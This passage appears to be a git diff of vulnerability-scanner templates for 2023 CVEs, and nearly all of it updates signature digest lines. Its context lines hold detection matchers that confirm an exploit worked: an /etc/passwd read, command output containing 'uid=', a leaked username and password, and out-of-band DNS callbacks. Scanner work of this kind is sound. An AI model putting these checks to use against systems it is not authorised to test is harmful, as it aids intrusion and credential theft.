4b0a00483046022100c2f79dc8a421606bbe12a26b6bcd3651ce312cbeee353eb0058182d1b3926db2022100c22097f0aa51802f172b8c79656b3931df3f2aa0d30b5e94c42bb6c2ff02f400:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210083964b313e7a000d9ca10222db41e2eee010e7cd8de85ee18f2db5cad563203a022032222c84acefa05972a5e7cbc5abe8dc5b06bb5c6fe3f3a7f3dbfe496185e9a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-41763.yaml b/http/cves/2023/CVE-2023-41763.yaml index 5574d98b8e..83b280095d 100644 --- a/http/cves/2023/CVE-2023-41763.yaml +++ b/http/cves/2023/CVE-2023-41763.yaml @@ -47,4 +47,4 @@ http: part: body words: - 'Skype' -# digest: 4a0a0047304502204d385a1c2eabf2010aab8e2dc414636c821517c645d7f7454d930d398747d67b022100cd62b6a6ce39bd5762d8089f31dc55530c0182275b0fdc256b5ed3300e53e4c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008574c7ffe3f2d223a370c177cd5f6a730ad922172a140cbffc9f5a9f8816d7b2022063b5865c4679400fa4eccb249c810758f208573eb01c9d2c7dd29a12a74aa6b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-41892.yaml b/http/cves/2023/CVE-2023-41892.yaml index 6d4426101b..03cb6859b5 100644 --- a/http/cves/2023/CVE-2023-41892.yaml +++ b/http/cves/2023/CVE-2023-41892.yaml @@ -48,4 +48,4 @@ http: - "CraftCMS" condition: and case-insensitive: true -# digest: 4b0a00483046022100bef16c09352bcddedd249be504eae14354554e288442e838bc5ceefa5149a6370221009480bd063880d15392df84fc7d6c7d256677d9ddb190425ccf319ab5b64c1716:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100aad1f217ee128d29074789cd117c40e3282239935d06572fcaa77b86163f341e02210095f7a4e31640bdb832d3ea6eca1444a46122d4ab75e9694e88c664052c6699d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-42442.yaml b/http/cves/2023/CVE-2023-42442.yaml index 196442230c..fd3dbfd808 100644 --- a/http/cves/2023/CVE-2023-42442.yaml +++ b/http/cves/2023/CVE-2023-42442.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022056c740fc5645290237c9ed3d38594f1c08b5e60e15db07c695228b0949457784022100fb351a9723c5de4a59566e98322107608ec9657e3602c71dc050b9b375994aaf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210096ac59ffe6bcfa5dd7100c93ac3af8d09f2a4cac40b28fad5dabf9f9c9b5bcd8022100df7fdc6e652c63a0d7016de1c4e2968d33bed7836b40795689ba1a90e70c1e66:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-42793.yaml b/http/cves/2023/CVE-2023-42793.yaml index 97ed5429c7..8b171bec3f 100644 --- a/http/cves/2023/CVE-2023-42793.yaml +++ b/http/cves/2023/CVE-2023-42793.yaml @@ -74,4 +74,4 @@ http: regex: - 'value="(.*?)"' internal: true -# digest: 490a00463044022026f4c8ba9cd64942e6b47aeca1ae4c7a0428af0449dd14aef984e0d8c1c6e09302204256a4b88da06f8eee47c94cbde42e81ae16b511b6da5979bd88ea9761bae7f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205eaa6928145838a264b81009174c0dc9d2d07efed1abcc67ad062af010acdc59022100c3d2486f63bf27c5ee5f7979f5592a45a508ecffe3e3a82bd6606f185a3194d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-43177.yaml b/http/cves/2023/CVE-2023-43177.yaml index 9002704bfb..50e8d243c7 100644 --- a/http/cves/2023/CVE-2023-43177.yaml +++ b/http/cves/2023/CVE-2023-43177.yaml @@ -74,4 +74,4 @@ http: - status_code == 200 - contains(body, "crushadmin{{dirname}}") condition: and -# digest: 4a0a00473045022100830445e9bba00a117daddfca1259b9ef7a022d6fe27e13f9cb7b40949407bd9c02204a02f01f53e956fcc4b5e30944fd8a5bc1bb49d9f20ff4fb78329f46f5adf916:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e013ea63ca1f07dde63ec297ffbbd1f37e560231c1396d3dd07debcc39e7a17502202b87f70d993704c3d894534a22f376c9b0e545474adef184c0f7ca697a37708b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-43187.yaml b/http/cves/2023/CVE-2023-43187.yaml index 9af87f47a0..4720b4b23b 100644 --- a/http/cves/2023/CVE-2023-43187.yaml +++ b/http/cves/2023/CVE-2023-43187.yaml @@ -67,4 +67,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220201c4d48716a02d2c66be4a7318bc2ac1dc92830e14b1535590a9c46f12dd8b702207930b8b7e7e95cef77c5f136bcadcbbe6b1dff80070bdf6dad62f0623c96f6e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206f73e8bfe9f915a5f04e492f88298ddf9c08f2c4fba07b868c0fefcc55b5585e02205b4976d241ea3d57d596f3af37f9478a17a66b28bf536fe9d09ab098811bbb99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-43208.yaml b/http/cves/2023/CVE-2023-43208.yaml index 98b9918453..fca1c6ab1c 100644 --- a/http/cves/2023/CVE-2023-43208.yaml +++ b/http/cves/2023/CVE-2023-43208.yaml @@ -106,4 +106,4 @@ http: regex: - '(.*)' internal: true -# digest: 4a0a0047304502206fe736214580619678b34e475a3c7fd97fa9c3bbd559bf1db7ac3d3724dd3832022100878eabed20ca61c94683b6daeb92fa1739f9893c5501986e8c77541479cd3adb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a1e9081fcf2640083fdd862acec818d87d0f43577b03501b09a3ffb1e9fa52a0022058a1099f807d9fb0552b82ca66443623a6b96ac354f97bb5a13b40777c73743b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-43261.yaml b/http/cves/2023/CVE-2023-43261.yaml index d3499af1d8..59ff524e0e 100644 --- a/http/cves/2023/CVE-2023-43261.yaml +++ b/http/cves/2023/CVE-2023-43261.yaml @@ -39,4 +39,4 @@ http: - type: regex regex: - '"username":"([^"]+)","password":"(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)"' -# digest: 4a0a0047304502207394fd4bf1e89bd3f82e011d999c60cb16f8e489eb83397b2cb5d1fd7643db0e022100d5913daa6cf013217df6a366ae32509ce0316d4ac4be68b7150926e99c883030:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022055b449c697f3cf7d0fd4bbb71d220dfd5d97c2a8f9f20272f94d63f3e24906b2022100c663ea58c5cf68bfa82ec127044032a57e3a96d96e988a7115490ec416211cd7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-43325.yaml b/http/cves/2023/CVE-2023-43325.yaml index 732dc80970..2f903a2820 100644 --- a/http/cves/2023/CVE-2023-43325.yaml +++ b/http/cves/2023/CVE-2023-43325.yaml @@ -41,4 +41,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "", "mooSocial")' condition: and -# digest: 4a0a0047304502202e377871e2dcf45ea88526dd773225b7426c810ec8d964008e5ae7740b376bbd022100ee2a52abdc80ae957ebaddab106be03f26fd93e09e9f1290a10149d53d6aa2f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b6d31b975d49d517924b62d996e9139c8afb6b35784a456bd830be0c53d4906e02200cc68e9cba608c058b0ffac9e1e7f36534ab2efa005af111f87169ebc1b9bff1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-43326.yaml b/http/cves/2023/CVE-2023-43326.yaml index 6f785e9c29..f5c0336200 100644 --- a/http/cves/2023/CVE-2023-43326.yaml +++ b/http/cves/2023/CVE-2023-43326.yaml @@ -40,4 +40,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "", "mooSocial")' condition: and -# digest: 4a0a0047304502210094826e0df08385c1006098c627611803a7a886633321a9b354a9f46b3fe45475022022c5d44415b7bc83f55c50510556c7b4d13feb3317fb5e82ef3fc4fd9eaef1c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220310e54c3bfa2512ef8c5ed7a4a2f4404e38fac783268ba1c8e423271f4e6e74f02207a1dd30a82dadfd1dece2f3178c3eef779f0098c66d3f296198600563fa1b141:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-43374.yaml b/http/cves/2023/CVE-2023-43374.yaml index 49692b3e4c..0156015bfa 100644 --- a/http/cves/2023/CVE-2023-43374.yaml +++ b/http/cves/2023/CVE-2023-43374.yaml @@ -61,4 +61,4 @@ http: - 'status_code == 200' - 'contains(body, "HotelDruid:")' condition: and -# digest: 4a0a00473045022100e833bee8477a7d35d428595751237754df5f6dcd346f312d7bd3b39aff1ce502022073b0e42e337aadd7c1cd77196e08e3ecada460c031dca3ecfd850b727521655f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008a3d00145dba4f11fa3c549cfa464edc1794ba65015e1ab6ff2f303f742b48ad02210089f51b3a2d6226c518403fa409af45ac3721bc5826816fda85b9e55db8d1b961:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-43795.yaml b/http/cves/2023/CVE-2023-43795.yaml index 18838f4b30..1b03319341 100644 --- a/http/cves/2023/CVE-2023-43795.yaml +++ b/http/cves/2023/CVE-2023-43795.yaml @@ -81,4 +81,4 @@ http: - contains_all(to_lower(interactsh_request), '{{string}}','{{value}}') - status_code == 200 condition: and -# digest: 4b0a0048304602210082f80177b7581f04212dc0576a4751ee20bdab22835edf2095f77a79c13757720221008fbe8e42bc297fe303de98bdf9b8426e646574e35cf00e0f6481f28a7b6e2bb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202532b6c5eb4c8b86a6cbc92d99c1674017335e78d0932d798e89cbebd4e5e9e002210098facfd15b6f7d648364dcede3e8c1992b3c7a2d58b7b4200f5ce25ba1fc691a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4415.yaml b/http/cves/2023/CVE-2023-4415.yaml index 9cff578c2a..c5d526d415 100644 --- a/http/cves/2023/CVE-2023-4415.yaml +++ b/http/cves/2023/CVE-2023-4415.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f4a0364d29e6d0e864db602feaaae08fc127111b3fec57f533478cf3e87a10ca022100bbcf82e6d3554f4b048f608fede70c8cd68e70453354e55f9644a720664e29d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022020896244e031d49e7315d5d7a04a1b190d61e9cb650d793b5043f1e715c994aa022100885c3f96f29b282e9f9657adafc6131cd3570d5aaad3a00ac6cf86145d578db6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-44352.yaml b/http/cves/2023/CVE-2023-44352.yaml index 612d04fdf4..1a4909be15 100644 --- a/http/cves/2023/CVE-2023-44352.yaml +++ b/http/cves/2023/CVE-2023-44352.yaml @@ -56,4 +56,4 @@ http: - "contains(body, 'ColdFusion')" - "contains(header, 'text/html')" condition: and -# digest: 4b0a004830460221008fbb590bc361593981c4b4ca8788ce40ec113fa6cb5f66d0494289924511b5a50221008b3fce96d336a94a73797aaec994cc638d7b228ab77ab19cc9a08f89a1d4b9fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022059f1e5596ee1f04789829fe74baa6cb52966bf9b3c4389095a78032a93765fdf0220434facfe54a80f0b3571fab017d7d4e1b2dffce3ab40ed44ad4d1ab1977a2ca1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-44353.yaml b/http/cves/2023/CVE-2023-44353.yaml index b74ce8c896..aa04c22912 100644 --- a/http/cves/2023/CVE-2023-44353.yaml +++ b/http/cves/2023/CVE-2023-44353.yaml @@ -82,4 +82,4 @@ http: - "status_code_3 == 500 && status_code_4 == 404" - contains(body_3, "coldfusion.runtime") condition: and -# digest: 4a0a004730450220047bd272fa85a31954610677163c6d46bc1bc7e4cbe15197f0a08be5f0919fcf022100a0fbfd66e5f0e75667e67d3994d5f3fda3fa376e5401a3eee32f69955eb0e4e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d8c27c20ad5d3c1c52b7a1ad36e3d3e1ee89d1c63ce26c18b8cd328f88d34e0e0221009b45448145bd15637757560e893ba4584359745deb71a3cb2e6a88c3fe692517:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4451.yaml b/http/cves/2023/CVE-2023-4451.yaml index 48b2ffe41f..c73b212557 100644 --- a/http/cves/2023/CVE-2023-4451.yaml +++ b/http/cves/2023/CVE-2023-4451.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100fbe7607e0757fba526338e3de141fc45574561029d8df0e67ec0661ed4fa9ff802201f80e83613cd2bdbb2fb20e60560b066dc1c68da990157d9f6c49c9613db4636:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100919530c2f7eb2d3d2714d81d366dfeb7bc9b208c1680d3cb1de728f8a718b6e402204a0caedb90860c959e6114777399de2c90c306bb411e57ff7b225308d11f8b76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-44812.yaml b/http/cves/2023/CVE-2023-44812.yaml index 3bce26624b..2ab6310d5b 100644 --- a/http/cves/2023/CVE-2023-44812.yaml +++ b/http/cves/2023/CVE-2023-44812.yaml @@ -57,4 +57,4 @@ http: - 'contains(header, "text/html")' - 'contains(body, "")' condition: and -# digest: 4b0a00483046022100f555f0259ec83f340fb6efe6252abd7b67f304c538fe2d4bb5a46d4a3e7d209e022100f7db3b06b1e97e43235ec12bfd7dc548956be134f2728dc384fc52e4ed35af51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220136a9de10e94de42f088109120fa3ba436becffc820d8cf6ca179b443cbe6528022022a9923ab3af464a7edfb72ae5f34ed2ea5a1ed918f98aefe7ce55f5cf7fe821:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-44813.yaml b/http/cves/2023/CVE-2023-44813.yaml index 501673e2a6..9d0c9e2e8c 100644 --- a/http/cves/2023/CVE-2023-44813.yaml +++ b/http/cves/2023/CVE-2023-44813.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100acfa09d8753734777ae264a34a2301092b20f0e9752d3c46a2c1cd62a768413a02204a56fbddcb961f4ecc0a6a20bde95cc3eaef3f8e5f60254eec300b6c960addbb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022071bda73ca2ae11746f2c9685d5f5a43f5eef73cedecf65a6cdfa71c30d4a4e9c022100e71ac3a7b2ffbf2cf2a6215d2a11806033fd920b5cabe4378f53eefd1f6bb1bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4521.yaml b/http/cves/2023/CVE-2023-4521.yaml index bf24c77f4b..36eba8883d 100644 --- a/http/cves/2023/CVE-2023-4521.yaml +++ b/http/cves/2023/CVE-2023-4521.yaml @@ -48,4 +48,4 @@ http: part: interactsh_protocol words: - "dns" -# digest: 490a00463044022002d89f2b86a35aa84fbf049f2e5074005a9225a3532e05d405dcb474452f7dd10220583d87dc17b3e9d079f09e3e12275e8e07965a6f325121265f93559902e6cd3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cea4d3768425ffc332055d1f40fd366c8091a06a7b799b66e8b91090b83543670221008f1b308f749b58447861c6a69747cf99284ce97abb240eca5b47bece1e7d1249:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-45375.yaml b/http/cves/2023/CVE-2023-45375.yaml index cecb719429..984446aece 100644 --- a/http/cves/2023/CVE-2023-45375.yaml +++ b/http/cves/2023/CVE-2023-45375.yaml @@ -56,4 +56,4 @@ http: - status_code == 302 - contains(content_type, "text/html") condition: and -# digest: 4a0a0047304502207f826adf0d940782fb53c8bc4a06f53a4735b9231586bf8c8b26306e06b521b0022100ebe60a3c7c67085fab3cb503a91f7b59e5bb9148ae8ec4682025a107d73c1285:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009ed47ceb0a90cf361c53d57e4de9cbf37f13e67f59c4ef3301f2b2df37b27d5e02210085057ec399c9228fdb57ce3ba2f16e674441a6a71eaa5d9a1e060407d67cd34f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4542.yaml b/http/cves/2023/CVE-2023-4542.yaml index 7dc533eff5..2e270317c4 100644 --- a/http/cves/2023/CVE-2023-4542.yaml +++ b/http/cves/2023/CVE-2023-4542.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100dc92305d342eed9bff2b49941c87cd9a974ab188c2908ff7bd7f23c4c8f0e2b70220122a54ccac0cf268d09ddecb89e8e8ac1b923dda7db8174e58415bb32e9aaea0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022060df5103e223276fb6d8f055c980a6bbe35dd67b2306bb265e79f603b1e2cdcb0221009e6c96fe2685faf298d01023b503fbee99fbd2ea6d0061279e868f5e19ad0d6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4547.yaml b/http/cves/2023/CVE-2023-4547.yaml index 8b9371da82..fc2dfa7bad 100644 --- a/http/cves/2023/CVE-2023-4547.yaml +++ b/http/cves/2023/CVE-2023-4547.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203881baea28e873f7b5ad584cb004cc063a9d3ef0dee49650fe7b62fc6d7ffec9022100be7a7ade3690efb97076067dc73377ad9a8478b836576bc79de4f0ffc9df4190:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022029cda6ad135bffafeee5ebf0105becd915cfd86c8f9c3d8f7e80614706e35e3c02207ac440100d7b051e5d940d8a47729ba666c07b91ea0048467fcd5bc5b054a142:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-45542.yaml b/http/cves/2023/CVE-2023-45542.yaml index 279a767856..6d565cea8d 100644 --- a/http/cves/2023/CVE-2023-45542.yaml +++ b/http/cves/2023/CVE-2023-45542.yaml @@ -39,4 +39,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "", "mooSocial")' condition: and -# digest: 4a0a00473045022100de148fe4e6242e6abc19d6fe4f2669b68922af5ebaa974d857cab105774563380220725cdbee34b4e77e346808179b3b069fc13c9ddd462fc0c2e4d0ead40654f5df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022050d66c74e9df8882762bfc2f88213f3ebb8a9d022a161abc14b7fe226651f90a022100ddb93a8f08d2392952d72477e8e791070dfe68bff1adcf671ff9e92a79541cb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-45671.yaml b/http/cves/2023/CVE-2023-45671.yaml index 4c5ca209a2..f70d7f4030 100644 --- a/http/cves/2023/CVE-2023-45671.yaml +++ b/http/cves/2023/CVE-2023-45671.yaml @@ -41,4 +41,4 @@ http: - 'contains(header, "text/html")' - 'status_code == 404' condition: and -# digest: 490a00463044022072f73c6b300dc9b4e94b56e4753b236e144171f0420af4af0c13097305edae9e02206f5f7b3429e24d9476d31c541f16ad723124a4d8759358b86c67b9e96043b3e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206549e7d89d4cabf890f7dd5c47971d2d500c35cf05dc00991d8042f8ba05048702210088b175e088e53a64fcf3ee366894f0786a1449b7d949cf8fd59977c356e0501f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4568.yaml b/http/cves/2023/CVE-2023-4568.yaml index 934220426c..b214413bbb 100644 --- a/http/cves/2023/CVE-2023-4568.yaml +++ b/http/cves/2023/CVE-2023-4568.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022025b4e549e5cbd393beb59ce312d7a29bca8d0ab3b16c64fcf93b2ff8aa4875d0022100bd23ccd1b14160f48ab3c24a399e2817f0d49b50869d7cc20c63a6f9a5c35920:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022045817ca3e4b06f54006a083834f2f49c2cd46518d02df1e98005b2c039428ea4022100956c32e109de21a677f32a35f4b91d7683d144ddb68a4afa6dab8e02eb69841b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-45852.yaml b/http/cves/2023/CVE-2023-45852.yaml index 40fc014d4b..2296049141 100644 --- a/http/cves/2023/CVE-2023-45852.yaml +++ b/http/cves/2023/CVE-2023-45852.yaml @@ -46,4 +46,4 @@ http: - 'contains_all(header, "application/json")' - 'contains_all(body, "traceroute: {{randstr}}: Unknown host", "daemon:x:1:1:")' condition: and -# digest: 4b0a0048304602210081c3ca1a9aa062b68de5767bf7196688722aa953aa66d1d2cb1bdc3f923cbe83022100d963ef7152e0de5b68eb3b89bfd22b0989532ba9aa9a5682f2e08f7f39c0c4ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210085b2b1f764e51be689c91047cc94f5cb4198bf49f465296a7981a95eea7357ca022055981c9b3c5fb91b61bbd0832c5036724efd1b7619dfa8ef96552ad6ea14e392:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-45855.yaml b/http/cves/2023/CVE-2023-45855.yaml index 1a9ba0747d..1c08d1ff93 100644 --- a/http/cves/2023/CVE-2023-45855.yaml +++ b/http/cves/2023/CVE-2023-45855.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100cbd700fb07947d7ab0657ac97cf57a41ceb390ba95b91f5ebd3eb5dc4ed2246b02210086b07d8dd2293a1fc75a3d80d0c9dcf34ddff95b979e4eccefddd9d1fc606ee3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220063229418aa406537c205e10dbb0c643676c5437c17c7a2d99e3951c6af78bd902204b4c4b4a1504f52e3b18c478bdcb12099c06fa51fb4cfe83b2609fcaa6d24f0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4596.yaml b/http/cves/2023/CVE-2023-4596.yaml index 048586acff..e9b2f188d1 100644 --- a/http/cves/2023/CVE-2023-4596.yaml +++ b/http/cves/2023/CVE-2023-4596.yaml @@ -120,4 +120,4 @@ http: regex: - 'name="form_id" value="([0-9]+)">' internal: true -# digest: 490a0046304402200a1c235894179ebe8c3f66906af4a98bd5c47e1557fc2d02ce2971dcddf24dd702201951b001521e150f7c417b8bb7f6337c057342b9078fde8029f33a33a7306e1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022065509c17e436af513a6aebcc13d0c76b86c749c84a580f35e76d85e651638ef0022037ff3775b4ea005336fbd9c770d899f80e6b2fe8fe715df1bb5b4d901727c1f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4634.yaml b/http/cves/2023/CVE-2023-4634.yaml index 83b1983004..90ada3df16 100644 --- a/http/cves/2023/CVE-2023-4634.yaml +++ b/http/cves/2023/CVE-2023-4634.yaml @@ -51,4 +51,4 @@ http: part: interactsh_protocol words: - "dns" -# digest: 4a0a00473045022100e549b41871d31392747cdd52ed45cbab5066b928e541fe6d1cd3e586fd1e3d0402205038b8281f90eead08d25ddf1e5281bf5dfd5463c328381896bd01903596e39e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fcc2fc055a5da201109bade2e7fdeddede95aeb7a188fab06c3456e5399efa88022037681d07e7726e39aabe7ed62f0f31aea09f562101fd5bc4b0f84e32dacb6cc1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-46347.yaml b/http/cves/2023/CVE-2023-46347.yaml index c99a76fed6..fd414b8270 100644 --- a/http/cves/2023/CVE-2023-46347.yaml +++ b/http/cves/2023/CVE-2023-46347.yaml @@ -43,4 +43,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(header, "PrestaShop")' condition: and -# digest: 4a0a00473045022100ba7f8d681eec29e6dd0682484b99bef70ea6763f14489f9b94b59485933301e102202d939b5e05c4199a2ae937c418c2dd3947f86b5a14d3ea6ac0fc0defe7065e50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fcf1fa0ab8abf930cc54e2e36e12162ce45903bb1174d276169b804569bdcbd3022100ba838fd7c91cfcf30ad83604f683acdbb55a6180642ef6b268212d503ab63407:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-46359.yaml b/http/cves/2023/CVE-2023-46359.yaml index f314c1bc5d..24d84a38c4 100644 --- a/http/cves/2023/CVE-2023-46359.yaml +++ b/http/cves/2023/CVE-2023-46359.yaml @@ -46,4 +46,4 @@ http: part: interactsh_protocol words: - "dns" -# digest: 4a0a0047304502203fa3579cee7f457c57f4c570aec49072afb073eb3669f6d1ce3fae59bda5bca8022100c56de69f4564bd736a8ec6c9c10256a835946eea129a254373943592eee6e773:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202888b227c4fc5d9e9dbc27d36458020336b6ed8e6fcb725e333dfcdb7b41762c022029d7c176b42c015a3830d41ff3deb6ae9e2dbbe71548daabb3f1fc870bd5cba0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-46574.yaml b/http/cves/2023/CVE-2023-46574.yaml index bc3ad91ddb..60047d0dd1 100644 --- a/http/cves/2023/CVE-2023-46574.yaml +++ b/http/cves/2023/CVE-2023-46574.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100cec6143c8e148bcc11dd54548c3052458b343eb437ff02989f587d6b10a8ef100220443a97a1f7f060d356652fa2ee6c51d593fba94809abfbec6d342e6db08e8167:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100facb0b4f06b2e2c5209852068584070ba87ac30a8da4f41b1a3c0b06e4428d84022002157bb5bfa1a8116a1b371084cccae6663353e69520bdbad5b0d70690cfa27c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-46747.yaml b/http/cves/2023/CVE-2023-46747.yaml index 3995d27988..7242a7edba 100644 --- a/http/cves/2023/CVE-2023-46747.yaml +++ b/http/cves/2023/CVE-2023-46747.yaml @@ -105,4 +105,4 @@ http: - "commandResult" - "uid=" condition: and -# digest: 4a0a0047304502200631280cc82577d9f04af6a40e44cc38fb51e389f5af5a180e0e4eda44442ef102210091b6ea9b756def972bfe043e90ead64bddc58fbdaf68ccec09743b77a0a2883e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204a6166b195e370aafa4a35dc97ea5b6f9d560fce6e62b0ad190525b9e9e0961c022076ba5b36c53579d2b152d64ef214f5a373cd5b9870f6e878c31e6e96ef776d57:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-46805.yaml b/http/cves/2023/CVE-2023-46805.yaml index 403d79c66c..f123a46756 100644 --- a/http/cves/2023/CVE-2023-46805.yaml +++ b/http/cves/2023/CVE-2023-46805.yaml @@ -56,4 +56,4 @@ http: - 'contains(body_2, "block_message")' - 'contains(header_2, "application/json")' condition: and -# digest: 4a0a00473045022100d20c5dc0052826ea14f0dff2969048d96672f04b90e75cb43a55f82c0cdf9b9902203f2a6f982a2068da15545263b3a76ce341cbca2cd7c16dc3d0a16e8f9bd283bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204ce6f60ef24fce30190ea7ba01627fbca1aed1ae80b11b7f5735c74db013d020022100b21ef93a501b8278f0621f6eb80984f16f66275b761b45d67834eeaeae10b8b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4714.yaml b/http/cves/2023/CVE-2023-4714.yaml index 89ad645b26..7a647f67d5 100644 --- a/http/cves/2023/CVE-2023-4714.yaml +++ b/http/cves/2023/CVE-2023-4714.yaml @@ -52,4 +52,4 @@ http: part: body regex: - 'key: "([a-z_A-Z0-9]+)"' -# digest: 4a0a0047304502207eb10bbaaa9606985258a5fcc9285e6588b5043561e22bf71d534354f33b32d1022100f2f9202c1144fa3549e6f9370b54451d794f24d2cf391fdc9a83fbb2fb76db55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 